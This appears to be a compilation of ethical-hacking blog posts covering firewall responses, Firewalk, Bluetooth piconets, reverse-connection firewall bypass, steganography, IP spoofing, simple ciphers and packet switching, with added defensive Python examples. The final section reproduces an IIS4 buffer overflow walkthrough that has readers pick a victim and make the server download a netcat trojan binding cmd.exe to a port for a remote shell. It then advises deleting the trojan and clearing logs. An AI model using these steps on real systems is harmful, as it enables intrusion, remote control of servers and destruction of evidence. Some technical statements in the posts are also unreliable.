Detection of Network Responses Through Various Symptoms

A probe can produce one of the following four states, which let us read the response of the network connection: whether it was accepted, or why and where it was rejected, dropped or lost.

No Response – If no packet is received, then there is a chance that the original packet has not reached its destination IP address. The other possibility is that a security device placed in between may have dropped the packet.

RST/ACK – If a RST/ACK packet is received, the packet was rejected either by the IP stack installed on the host or by a security device (e.g. a Checkpoint reject) installed on the host.

SYN/ACK – If a SYN/ACK is received, then the port from which the response was received may be open for connection.

ICMP type 13 – If an ICMP type 13 packet is received, then the administrator on the host has prohibited this type of connection (high level of security). Often a router will use this response to implement its ACL security policy.

So when we hping an FTP or other TCP port on any host, we should receive an ICMP or RST/ACK response. But if hping shows a response flagged RA, it should be noted that some kind of security device is installed between the port and the intruder.

Ethical hackers analyze such responses carefully to plan further scans and to secure their systems using a black-box approach.
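
The four states above can be told apart from the raw reply bytes. The following is an added example, not code from the original post: it parses an IPv4 reply and maps it to one of the four states. The "administratively prohibited" message is matched as ICMP destination unreachable (type 3) with code 13; the sample packets and addresses are constructed for the demonstration.

```python
import socket
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10  # TCP flag bits

# Interpretation of each state, as given in the text above.
MEANING = {
    "no-response": "packet never arrived, or a device in between dropped it",
    "rst-ack": "rejected by the host IP stack or by a security device",
    "syn-ack": "port may be open for connection",
    "icmp-prohibited": "administratively prohibited (router ACL policy)",
    "other": "not one of the four states",
}

def classify(reply):
    """Classify a raw IPv4 reply (bytes), or None when the probe timed out."""
    if reply is None:
        return "no-response"
    if len(reply) < 20 or reply[0] >> 4 != 4:
        return "other"
    ihl = (reply[0] & 0x0F) * 4      # IPv4 header length in bytes
    proto, body = reply[9], reply[ihl:]
    if proto == socket.IPPROTO_TCP and len(body) >= 14:
        flags = body[13]
        if flags & RST and flags & ACK:
            return "rst-ack"
        if flags & SYN and flags & ACK:
            return "syn-ack"
    # Administratively prohibited: ICMP destination unreachable (type 3), code 13.
    if proto == socket.IPPROTO_ICMP and body[:2] == b"\x03\x0d":
        return "icmp-prohibited"
    return "other"

def ipv4(proto, body, src="192.0.2.10", dst="192.0.2.99"):
    """Build a constructed IPv4 packet (checksums left at zero) for the demo."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(body), 0, 0, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + body

def tcp(flags, sport=21, dport=40000):
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 0, 0, 0)

# Constructed sample replies, one per state.
SAMPLES = {
    "timeout": None,
    "closed": ipv4(socket.IPPROTO_TCP, tcp(RST | ACK)),
    "open": ipv4(socket.IPPROTO_TCP, tcp(SYN | ACK)),
    "filtered": ipv4(socket.IPPROTO_ICMP, struct.pack("!BBHI", 3, 13, 0, 0)),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:9} -> {classify(pkt):16} {MEANING[classify(pkt)]}")
```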

Firewall Responses Detection & Breaking The Firewalls

The behavior of packets and their responses explained in the last post has been noted by a number of firewall vendors. By understanding such enumeration, they have modified their security systems for high anonymity by spoofing the source address of the RST/ACK packet to be that of the target host. As such, the response received by an inquisitive attacker is supposed to be a RST/ACK from the target, rather than the gateway.

This is, of course, uncertain, as it implies that the packet has reached the target before being rejected, which we may already have assumed. But actually there is a gateway that is filtering the traffic.

Breaking any firewall needs a vast knowledge of how firewalls work. But beyond that, we can also learn how firewall vendors provide stealth to their systems.

Firewalls Break in

Generally, in modified Firewall and Intrusion Detection Systems (IDS) environments, rather than rejecting packets that policy does not accept, they will simply drop the packet without any comment. As the scanner never receives a positive or negative response, there is no way of telling whether the packet did not reach the target because of network problems, whether the target no longer exists, or whether the packet was intentionally dropped en route.

And this is where firewalls succeed: they hide from the intruder the way network ports are responding, and the chances of further attack are reduced. The resulting ambiguity and timeouts will slow down the scanning process, and prevent many tools from revealing information of any kind.

But this does not mean that such a firewall is unbreakable; experienced ones always have something strong in their hand, named Experience.

Piconet : Know The insides of Bluetooth Architecture

Bluetooth is an open system that enables short-range wireless communication of data and voice. It comprises hardware and software components.

Bluetooth architecture consists of a master and slave arrangement; both are symmetric, i.e. in the same device. In Bluetooth architecture the communication occurs between a master unit and a slave unit, while they share the same channel for communication. Each device has a unique 48-bit address that is fixed. Two or more radio devices together form ad-hoc networks called Piconets. These Piconets consist of one master and seven slaves, as shown in the figure.

Activation of the Piconet is known by the 3-bit active device address. The piconet forms the link from one Bluetooth device to another Bluetooth device. The master is only responsible for establishing the Bluetooth link in the same device. The slaves are not allowed to communicate between themselves.

[Figure: Piconet]

During communication, various protocols are also involved, as follows:
Bluetooth core protocols – Baseband, LMP, L2CAP, SDP
Cable Replacement Protocol – RFCOMM
Telephony Control Protocols – TCS Binary, AT Commands
Adopted Protocols – PPP, TCP/IP, OBEX, WAP, vCard, vCal, IrMC, WAE

The description of each protocol at each layer:

The RF layer:
The RF layer is the lowest defined layer of Bluetooth architecture. The Bluetooth air interface is based on a nominal antenna power of  extensions for operating at up to 100 mW worldwide.
The nominal link range is 10 centimeters – 10 meters, but can be extended to more than 100 meters by increasing the transmit power to 100 mW.

The Bluetooth Baseband:
This layer defines the timing, framing, packets and flow control on the link.

The Link Manager
Responsible for managing connection states, enforcing fairness among slaves, and power management.

The Logical Link Control And Adaptation Protocol
This layer handles multiplexing, segmentation and reassembly of large packets, and device discovery.

Audio
The audio maps the data directly to the Baseband layer.

So, this was a basic introduction to Bluetooth technology, which is today a widely used medium for data communication. We are covering this topic to give more knowledge to everyone interested in Ethical Hacking and Bluetooth security.

Firewalk Attack: Beyond The Boundaries of Security.

Firewalk, which was developed by two masterminds, Mike Schiffman and Dave Goldsmith, furthers the techniques used both by static port traceroutes and hping.

It can be used to scan a host downstream from a security gateway to assess what rules relate to the target system, without any packets having to reach it.

Firewalk utilizes the TTL functions to carry out the whole attack. This was difficult for any firewall to analyze, and so it was described as beyond the boundaries of security.

Some of the facts that should hold true for any kind of firewall response are:

If the packet is passed by the firewall, a TTL expired message should be received.

If the packet is blocked by the firewall, this could be caused by either of the following:
An ICMP administratively prohibited response is received, or the packet is dropped without comment. Again, uncertainty is introduced through packets lost in transit. Some security gateways will detect that the packet is due to expire and send the expired message whether the policy would have allowed the packet or not.

Firewalls and intruders are always big rivals, as firewalls are updated in response to the techniques implemented by intruders. This sometimes makes things harder for firewall vendors and sometimes for hackers.
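
One way a defender could spot Firewalk-style probing at the gateway, as an added example (not code from the original post or from the Firewalk authors): a probe meant to expire one hop behind the gateway arrives at the gateway with a TTL of about 2, so one source probing many ports with such a TTL stands out from normal traffic. The log format, addresses and thresholds are assumptions constructed for the example.

```python
from collections import defaultdict

# Constructed log of packets arriving at the gateway's outside interface.
# Hypothetical format: time src dst proto dport ttl_on_arrival
LOG = """\
10:00:01 198.51.100.7 203.0.113.20 tcp 21 2
10:00:01 198.51.100.7 203.0.113.20 tcp 22 2
10:00:02 198.51.100.7 203.0.113.20 tcp 23 2
10:00:02 198.51.100.7 203.0.113.20 tcp 25 2
10:00:03 198.51.100.7 203.0.113.20 tcp 80 2
10:00:03 192.0.2.44 203.0.113.20 tcp 80 53
10:00:04 192.0.2.44 203.0.113.20 tcp 80 53
10:00:05 192.0.2.81 203.0.113.20 udp 33434 1
10:00:06 192.0.2.81 203.0.113.20 udp 33435 2
garbage line
"""

def parse(log_text):
    """Yield (src, dst, dport, ttl) for every well-formed line."""
    for line in log_text.splitlines():
        f = line.split()
        if len(f) == 6 and f[4].isdigit() and f[5].isdigit():
            yield f[1], f[2], int(f[4]), int(f[5])

def firewalk_suspects(log_text, max_ttl=2, min_ports=4):
    """Flag (src, dst) pairs that probe many ports with a nearly expired TTL.

    max_ttl and min_ports are assumed thresholds: a lone traceroute touches
    few ports, while a rule-mapping sweep touches many with the same low TTL.
    """
    probed = defaultdict(set)
    for src, dst, dport, ttl in parse(log_text):
        if ttl <= max_ttl:
            probed[(src, dst)].add(dport)
    return {pair: sorted(p) for pair, p in probed.items() if len(p) >= min_ports}

if __name__ == "__main__":
    for (src, dst), ports in firewalk_suspects(LOG).items():
        print(f"{src} -> {dst}: low-TTL probes to ports {ports}")
```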

Reverse Connection for Bypassing The Firewall

If you use a reverse connection you can also bypass hardware firewalls. A reverse connection is nothing more than the target server connecting to the client instead of the client connecting to the target server:

Client:20 <------- Target Server:30

Target Server:30 -------> Client:20

A bi-directional connection between the 2 sides has been established. Normally hardware firewalls only filter/block the outbound traffic, meaning that if a computer outside a LAN tries to connect to a computer inside a LAN that is behind a router/hardware firewall, it will run into errors like couldn't connect to the remote computer and so on.

Note that this method will only work if the IP address of the computer behind the router is not restricted from accessing the internet. If only some ports were blocked in the firewall rule, then this method is better than IP spoofing since it doesn't change anything; it just creates a 'tunnel'. It is also good to use this when a specific website or a keyword for a service or website was used in the firewall restriction, or when you don't have access to the firewall configuration and want someone outside the LAN to access some service of the computer inside the LAN.

There are tools that create a tunnel between the target server and the client. These are TCP/UDP port redirectors. A nice GUI (graphical user interface) tool is "WinIPRelay". Get it at http://voodootechs.com and open it.

Click the button “ADD RELAY”

In the field "Local Port" type the port of the local computer you want to use in the connection. Make sure it is not blocked or already being used. In the field "Remote Host" type the IP address or, if it is a website, the URL.

In the field "Remote Port" type the port of the remote computer that will be connecting to you. E.g. if it's a website then the port will usually be 80; if it is a service like Telnet the port is 23. If the remote computer wants to access a service on your computer (the one behind a LAN), then the remote port must be set up beforehand on the remote computer, and then you type it in this field. In the field "Connection Timeout" type a numerical value to set the time in seconds that the connection will stay established.

Click OK.

Supposing the service you wanted to access is a website, e.g. www.msn.com, and the local port you chose is 40, then you just open up your internet browser and type: 127.0.0.1:40 and the msn.com webpage will be displayed. Notice that port 40 must not be blocked.

Now suppose you want your friend to access your telnet server on port 23. If he tries a direct connection he won't be able to connect, so he must open a port on his/her computer and start to listen for connections. Suppose the chosen port was 55 and his IP address is 33.33.33.33: open "WinIPRelay" and set the local port to 23, remote host to 33.33.33.33, remote port to 55 and connection timeout to 999. If he opens his command prompt and types: telnet 127.0.0.1 55 he will reverse connect to your telnet server.

HTTP Tunnel -> bi-directional/reverse connection between 2 hosts using port 80 on the computer behind the LAN and using only HTTP requests when establishing the connections.

Steganography: Hiding Files In Images

Steganography is a method of hiding files in image files.

This is used mostly on a network so that files can be stored secretly. This method can be very harmful, since the source code of viruses and programs can be stored this way. Secret files can also be stored, and they can contain any information about the system and system weaknesses.

Following are the software tools used for steganography:

1. Image Hide

2. Snow: Files are stored in white or blank spaces of any text file.

3. MP3Stego: Used for storing files in MP3 file format, which is almost undetectable.

Prevention Measures Against Steganography:

We can use software for detecting such files, and we can also track the stored content for the security of the system.

Stegdetect: This simple software detects such files stored on a system or network.

Stegbreak: Used to crack the password of such files by dictionary attack.
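
A check for whitespace carriers of the kind the Snow entry describes, as an added example (not part of the original post, and not how Stegdetect or Stegbreak work): hidden data of this type sits in runs of spaces and tabs at the ends of lines, which ordinary text rarely has. The thresholds and both sample texts are assumptions constructed for the example.

```python
def tail_of(line):
    """Return the run of spaces/tabs at the end of a line."""
    body = line.rstrip(" \t")
    return line[len(body):]

def whitespace_profile(text):
    """Return (lines with trailing whitespace, total trailing chars,
    lines whose tail mixes spaces and tabs)."""
    hits = total = mixed = 0
    for line in text.split("\n"):
        tail = tail_of(line.rstrip("\r"))
        if tail:
            hits += 1
            total += len(tail)
            if " " in tail and "\t" in tail:
                mixed += 1
    return hits, total, mixed

def looks_like_whitespace_stego(text, min_lines=3, min_chars=12):
    """Heuristic: several lines carry long tails that mix spaces and tabs.

    A single stray trailing space is normal editing noise; repeated mixed
    runs are not. The thresholds are assumptions to tune per environment.
    """
    hits, total, mixed = whitespace_profile(text)
    return mixed >= 1 and hits >= min_lines and total >= min_chars

def visible(tail):
    """Render a tail so a reviewer can see it: S = space, T = tab."""
    return tail.replace(" ", "S").replace("\t", "T")

# Constructed samples: ordinary text with one stray space, and a carrier.
CLEAN = "Dear team,\nthe report is attached. \nRegards\n"
CARRIER = ("Dear team,\t  \t \n"
           "the report is attached.  \t   \t\n"
           "Regards \t\t  \t \n")

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("carrier", CARRIER)):
        print(name, whitespace_profile(text), looks_like_whitespace_stego(text))
        for line in text.split("\n"):
            if tail_of(line):
                print("   ", repr(line.rstrip(" \t")), visible(tail_of(line)))
```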

IP Spoofing Attack

Internet Protocol (IP) addresses are unique and are used for digital data communication on the internet. Any mailing system or website technology works on the same principle of digital communication.

Every computer connected to a network has its unique IP address.

When person A sends an email to person B, the mail is assigned a header which contains the IPs of the sender and receiver, so that the mail goes to person B and not to someone else.

Now, in a private network, for security reasons mail is accepted only from reserved IPs.

In simple words, only internal communication works. A person from outside can't send mail into that network.

So if an attacker wants to send mail inside, he will spoof the IP.

He will first sniff the data packets in the internal communication and steal some internal email.

Then he will make changes in the header of the mail. He will change the content of the mail and send this mail into the network again.

The system can't provide security against this because the mail has a fake internal IP.

This is how a fake IP is created and a spoofing attack is done.

Thank You all For Reading.

Security with Data Encryption

You might have heard this term many times before, but what is it actually? I am trying to explain it here in a small funny scenario.

Person A has to send a message to B, and some other person wants that message too; we name him Mr. X.

A wrote the letter and sent it to B by mail. Now Mr. X gets this message by some means. He reads the message and the secret in it is revealed.

Next time A writes the message in secret words (encryption), and if Mr. X now gets that message he cannot understand what is written, or gets fooled by a wrong message, and the secret is saved.

OK. Let me now explain data encryption with the above scene.

I have a message; I encode it with some key which is known to both A and B.

How does the key work?

Well, these are the normal letters we use.

ABCDEFG

I encrypt them with key 2. Now the letters become CDEFGHI.

A -> C, B -> D and so on…

In this way data gets encrypted, and a third person can't read it if he doesn't know the key.
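
The key-2 shift described above, as an added example (not code from the original post): A and B share the key and can encrypt and decrypt, while the last function shows what Mr. X can do without it. It goes one step beyond the text: a shift has only 26 possible keys, so trying them all recovers the message, which is why real encryption relies on a very large key space. The message and the known word used to recognise the plaintext are constructed for the example.

```python
import string

ALPHABET = string.ascii_uppercase

def shift(text, key):
    """Move every letter A-Z forward by key positions, wrapping after Z."""
    out = []
    for ch in text:
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)  # spaces and punctuation pass through unchanged
    return "".join(out)

def encrypt(plaintext, key):
    return shift(plaintext.upper(), key)

def decrypt(ciphertext, key):
    return shift(ciphertext, -key)

def brute_force(ciphertext, known_word):
    """Mr. X without the key: try all 26 keys and keep the candidates
    that contain a word he expects to see in the message."""
    hits = []
    for key in range(26):
        candidate = decrypt(ciphertext, key)
        if known_word in candidate:
            hits.append((key, candidate))
    return hits

if __name__ == "__main__":
    print(encrypt("ABCDEFG", 2))            # the example from the text
    secret = encrypt("MEET AT NOON", 2)     # constructed message
    print(secret, "->", decrypt(secret, 2))
    print("recovered without the key:", brute_force(secret, "NOON"))
```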

 

By the same encryption method, data on networks gets transferred with secured communication. Even if data loss takes place, the data is of no use without decryption.

In the figure, you can see that data first gets encrypted with the key. The encrypted data is known as cipher text. Then, with the same key, the receiver decrypts the data and a secure transfer takes place.

This encryption and decryption is generally done with the help of programs or clipper chips, and they have to be installed at both the sender's and the receiver's end.

The Flow of Packet Switching

Data is transmitted from source to destination by packet switching. So what exactly is packet switching?

In simple words, when you send a message through email, the message is broken into chunks of small size, which then travel to the destination and get recombined there, and the message is displayed to that user.

Just take a look at 'Figure 1' –

We have to send a message from A to B, so we have to make a wired connection between them. If the distance is 2-3 miles it is possible to do it.

But what if I wanted to send a message from India to China? Is it possible to place a wire between every computer? No way; therefore packet switching is used.

In figure 2 –

I have to send data from source A to destination H. My data first goes to B, then to C, D, G and then to H. The data packets get sent and received at many mid stations (C, D, and G). The same process of breaking into chunks and joining is repeated at all these points. The source and destination are almost 5000 miles apart, yet the data got transmitted through other addresses.

Packet switches go by different names, such as routers, gateways, bridges etc. Some of the advantages of packet switching are:

1. All the data chunks travel through the same or different paths but gather at the same address.

2. If the maximum size of a packet is kept limited, buffer management becomes simpler.

3. If one chunk is missed in the transfer, only that one chunk needs to be retransmitted for error recovery.

So this is how packet switching takes place in the internet world. The thing to notice is that data transfer tries to take the shortest path to reach the destination; as you can see in Fig. 2, the data was not transmitted through E and F. So with the help of packet switching, data transfer takes place intelligently and efficiently.

Amol Wagh

How to Attack IIS – Buffer Overflow

The Internet Information Server Attack – Remote buffer overflow exploit.
By r00tsec from Security Espionage Community.
Revised 03/16/00.

Forewords:
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience.
Note: All the files used in this paper can be found at the main page.

According to eEye Digital Security Team the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I performed the attack from a Windows NT 4.0 machine with the required programs:

iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe

Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people have received some reports from people not being able to use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.

How to do it:

First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or your favorite "what's-this-site-running-search-engine" and find a victim running the affected system. Second, you need to craft a buffer overrun about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.

Output:

——–(IIS 4.0 remote buffer overflow exploit)———-
(c) dark spyrit — barns@eeye.com. http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg – iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include ‘http://’ before hosts!
———————————————————-

Then issue the command as you can see in the example beneath.

C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!

note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.

After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.

Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

Voila! Access granted!
Do whatever you wanna do, but remember to:

    – add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)
    – add a scheduled task to delete ncx.exe X-1 minutes.
    – clean the log files (if there are any).